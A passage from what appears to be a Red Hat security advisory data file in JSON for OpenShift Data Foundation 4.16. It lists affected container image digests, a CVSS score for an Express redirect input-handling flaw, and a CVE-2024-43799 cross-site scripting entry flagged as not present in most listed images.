"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
